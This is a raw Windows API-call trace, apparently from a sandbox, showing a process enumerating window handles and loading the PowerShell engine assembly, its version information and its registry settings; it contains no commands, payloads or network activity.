	[0246.392] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.392] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.392] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.392] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.392] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x818
	[0246.393] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x5b8
	[0246.393] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x494
	[0246.393] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x1ec
	[0246.393] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x440
	[0246.393] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x7e8
	[0246.393] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x730
	[0246.393] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x2c8
	[0246.393] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x31c
	[0246.393] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x330
	[0246.393] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x128
	[0246.393] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x5c8
	[0246.393] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x6f8
	[0246.393] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x358
	[0246.394] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x73c
	[0246.394] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0xb0
	[0246.394] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x250
	[0246.394] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x240
	[0246.394] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x790
	[0246.394] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x61c
	[0246.394] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x540
	[0246.394] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x538
	[0246.394] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x568
	[0246.394] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x538
	[0246.394] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x568
	[0246.394] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x538
	[0246.394] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x540
	[0246.395] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x540
	[0246.395] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x510
	[0246.395] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x57c
	[0246.395] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x460
	[0246.395] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x554
	[0246.395] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.395] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x528
	[0246.395] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.395] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.395] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.395] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x79c
	[0246.396] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.396] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4e0
	[0246.396] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.396] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x460
	[0246.396] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x460
	[0246.396] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x44c
	[0246.396] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x778
	[0246.396] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x460
	[0246.396] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x558
	[0246.396] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.397] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4d0
	[0246.397] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x9b0
	[0246.397] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x8d8
	[0246.397] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x940
	[0246.397] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x93c
	[0246.397] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4ec
	[0246.397] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x150
	[0246.397] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x720
	[0246.397] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x3c4
	[0246.397] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x7d4
	[0246.398] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x6c8
	[0246.398] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0xb54
	[0246.398] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0xb54
	[0246.398] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0xb5c
	[0246.398] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x838
	[0246.398] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x818
	[0246.398] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x5b8
	[0246.398] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x494
	[0246.398] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x1ec
	[0246.398] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x440
	[0246.398] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x7e8
	[0246.399] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x730
	[0246.399] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x2c8
	[0246.399] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x31c
	[0246.399] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x330
	[0246.399] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x128
	[0246.399] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x5c8
	[0246.399] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x6f8
	[0246.399] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x358
	[0246.399] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x73c
	[0246.399] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0xb0
	[0246.400] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x250
	[0246.400] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x240
	[0246.400] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x790
	[0246.400] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x61c
	[0246.400] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x568
	[0246.400] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x538
	[0246.400] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x540
	[0246.400] GetWindowThreadProcessId (in: hWnd=0x700a4, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x510
	[0246.400] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x460
	[0246.400] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x79c
	[0246.400] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x4e0
	[0246.400] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x460
	[0246.400] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x20d680 | out: lpdwProcessId=0x20d680) returned 0x778
	[0246.403] WerSetFlags () returned 0x0
	[0246.815] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0246.815] CoTaskMemFree (pv=0x0) 
	[0246.815] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x20d9e8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x20d9e0 | out: pulNumLanguages=0x20d9e8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x20d9e0) returned 1
	[0246.815] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x20d9e8, pwszLanguagesBuffer=0x2b9dd30, pcchLanguagesBuffer=0x20d9e0 | out: pulNumLanguages=0x20d9e8, pwszLanguagesBuffer=0x2b9dd30, pcchLanguagesBuffer=0x20d9e0) returned 1
	[0246.820] CoTaskMemAlloc (cb=0x24) returned 0x498e00
	[0246.820] GetUserDefaultLocaleName (in: lpLocaleName=0x498e00, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0246.821] CoTaskMemFree (pv=0x498e00) 
	[0246.841] CoTaskMemAlloc (cb=0x104) returned 0x4a1330
	[0246.841] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4a1330, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.841] CoTaskMemFree (pv=0x4a1330) 
	[0246.842] CoTaskMemAlloc (cb=0x104) returned 0x4a1330
	[0246.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4a1330, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.843] CoTaskMemFree (pv=0x4a1330) 
	[0246.844] CoTaskMemAlloc (cb=0x104) returned 0x4a1330
	[0246.844] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4a1330, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.844] CoTaskMemFree (pv=0x4a1330) 
	[0246.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0246.852] SetErrorMode (uMode=0x1) returned 0x1
	[0246.852] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x20d660 | out: lpFileInformation=0x20d660*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0246.853] SetErrorMode (uMode=0x1) returned 0x1
	[0246.853] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x20d8d0 | out: lpdwHandle=0x20d8d0) returned 0x94c
	[0246.854] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ba15c0 | out: lpData=0x2ba15c0) returned 1
	[0246.855] VerQueryValueW (in: pBlock=0x2ba15c0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x20d848, puLen=0x20d840 | out: lplpBuffer=0x20d848*=0x2ba165c, puLen=0x20d840) returned 1
	[0246.855] VerQueryValueW (in: pBlock=0x2ba15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x20d7b8, puLen=0x20d7b0 | out: lplpBuffer=0x20d7b8*=0x2ba1738, puLen=0x20d7b0) returned 1
	[0246.855] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0246.855] CoTaskMemAlloc (cb=0x2e) returned 0x4a3390
	[0246.855] lstrcpyW (in: lpString1=0x4a3390, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0246.855] CoTaskMemFree (pv=0x4a3390) 
	[0246.855] VerQueryValueW (in: pBlock=0x2ba15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x20d7b8, puLen=0x20d7b0 | out: lplpBuffer=0x20d7b8*=0x2ba178c, puLen=0x20d7b0) returned 1
	[0246.855] lstrlenW (lpString="System.Management.Automation") returned 28
	[0246.855] CoTaskMemAlloc (cb=0x3c) returned 0x4a4860
	[0246.855] lstrcpyW (in: lpString1=0x4a4860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0246.855] CoTaskMemFree (pv=0x4a4860) 
	[0246.855] VerQueryValueW (in: pBlock=0x2ba15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x20d7b8, puLen=0x20d7b0 | out: lplpBuffer=0x20d7b8*=0x2ba17e8, puLen=0x20d7b0) returned 1
	[0246.855] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0246.855] CoTaskMemAlloc (cb=0x20) returned 0x4a0380
	[0246.855] lstrcpyW (in: lpString1=0x4a0380, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0246.855] CoTaskMemFree (pv=0x4a0380) 
	[0246.855] VerQueryValueW (in: pBlock=0x2ba15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x20d7b8, puLen=0x20d7b0 | out: lplpBuffer=0x20d7b8*=0x2ba1828, puLen=0x20d7b0) returned 1
	[0246.855] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0246.855] CoTaskMemAlloc (cb=0x44) returned 0x4a4860
	[0246.855] lstrcpyW (in: lpString1=0x4a4860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0246.855] CoTaskMemFree (pv=0x4a4860) 
	[0246.855] VerQueryValueW (in: pBlock=0x2ba15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x20d7b8, puLen=0x20d7b0 | out: lplpBuffer=0x20d7b8*=0x2ba1890, puLen=0x20d7b0) returned 1
	[0246.855] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0246.855] CoTaskMemAlloc (cb=0x76) returned 0x4455c0
	[0246.855] lstrcpyW (in: lpString1=0x4455c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0246.855] CoTaskMemFree (pv=0x4455c0) 
	[0246.855] VerQueryValueW (in: pBlock=0x2ba15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x20d7b8, puLen=0x20d7b0 | out: lplpBuffer=0x20d7b8*=0x2ba192c, puLen=0x20d7b0) returned 1
	[0246.855] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0246.856] CoTaskMemAlloc (cb=0x44) returned 0x4a4860
	[0246.856] lstrcpyW (in: lpString1=0x4a4860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0246.856] CoTaskMemFree (pv=0x4a4860) 
	[0246.856] VerQueryValueW (in: pBlock=0x2ba15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x20d7b8, puLen=0x20d7b0 | out: lplpBuffer=0x20d7b8*=0x2ba1990, puLen=0x20d7b0) returned 1
	[0246.856] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0246.856] CoTaskMemAlloc (cb=0x58) returned 0x464170
	[0246.856] lstrcpyW (in: lpString1=0x464170, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0246.856] CoTaskMemFree (pv=0x464170) 
	[0246.856] VerQueryValueW (in: pBlock=0x2ba15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x20d7b8, puLen=0x20d7b0 | out: lplpBuffer=0x20d7b8*=0x2ba1a0c, puLen=0x20d7b0) returned 1
	[0246.856] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0246.856] CoTaskMemAlloc (cb=0x20) returned 0x4a0380
	[0246.856] lstrcpyW (in: lpString1=0x4a0380, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0246.856] CoTaskMemFree (pv=0x4a0380) 
	[0246.856] VerQueryValueW (in: pBlock=0x2ba15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x20d7b8, puLen=0x20d7b0 | out: lplpBuffer=0x20d7b8*=0x2ba16b4, puLen=0x20d7b0) returned 1
	[0246.856] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0246.856] CoTaskMemAlloc (cb=0x66) returned 0x49f190
	[0246.856] lstrcpyW (in: lpString1=0x49f190, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0246.856] CoTaskMemFree (pv=0x49f190) 
	[0246.856] VerQueryValueW (in: pBlock=0x2ba15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x20d7b8, puLen=0x20d7b0 | out: lplpBuffer=0x20d7b8*=0x0, puLen=0x20d7b0) returned 0
	[0246.856] VerQueryValueW (in: pBlock=0x2ba15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x20d7b8, puLen=0x20d7b0 | out: lplpBuffer=0x20d7b8*=0x0, puLen=0x20d7b0) returned 0
	[0246.856] VerQueryValueW (in: pBlock=0x2ba15c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x20d7b8, puLen=0x20d7b0 | out: lplpBuffer=0x20d7b8*=0x0, puLen=0x20d7b0) returned 0
	[0246.856] VerQueryValueW (in: pBlock=0x2ba15c0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x20d788, puLen=0x20d780 | out: lplpBuffer=0x20d788*=0x2ba165c, puLen=0x20d780) returned 1
	[0246.856] CoTaskMemAlloc (cb=0x204) returned 0x447b80
	[0246.856] VerLanguageNameW (in: wLang=0x0, szLang=0x447b80, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0246.856] CoTaskMemFree (pv=0x447b80) 
	[0246.856] VerQueryValueW (in: pBlock=0x2ba15c0, lpSubBlock="\\", lplpBuffer=0x20d7d8, puLen=0x20d7d0 | out: lplpBuffer=0x20d7d8*=0x2ba15e8, puLen=0x20d7d0) returned 1
	[0246.863] CoTaskMemAlloc (cb=0x104) returned 0x4a1330
	[0246.863] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4a1330, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.863] CoTaskMemFree (pv=0x4a1330) 
	[0246.867] CoTaskMemAlloc (cb=0x104) returned 0x4a1330
	[0246.867] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4a1330, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.867] CoTaskMemFree (pv=0x4a1330) 
	[0246.870] lstrlenW (lpString="䅁") returned 1
	[0246.878] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d6a8 | out: phkResult=0x20d6a8*=0x304) returned 0x0
	[0246.880] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d698 | out: phkResult=0x20d698*=0x308) returned 0x0
	[0246.880] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d728 | out: phkResult=0x20d728*=0x30c) returned 0x0
	[0246.883] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d66c, lpData=0x0, lpcbData=0x20d668*=0x0 | out: lpType=0x20d66c*=0x1, lpData=0x0, lpcbData=0x20d668*=0x56) returned 0x0
	[0246.884] CoTaskMemAlloc (cb=0x5a) returned 0x49f120
	[0246.884] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d63c, lpData=0x49f120, lpcbData=0x20d638*=0x56 | out: lpType=0x20d63c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d638*=0x56) returned 0x0
	[0246.884] CoTaskMemFree (pv=0x49f120) 
	[0247.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0247.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0247.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0247.134] CoTaskMemAlloc (cb=0x104) returned 0x4a1330
	[0247.134] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4a1330, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0247.134] CoTaskMemFree (pv=0x4a1330) 
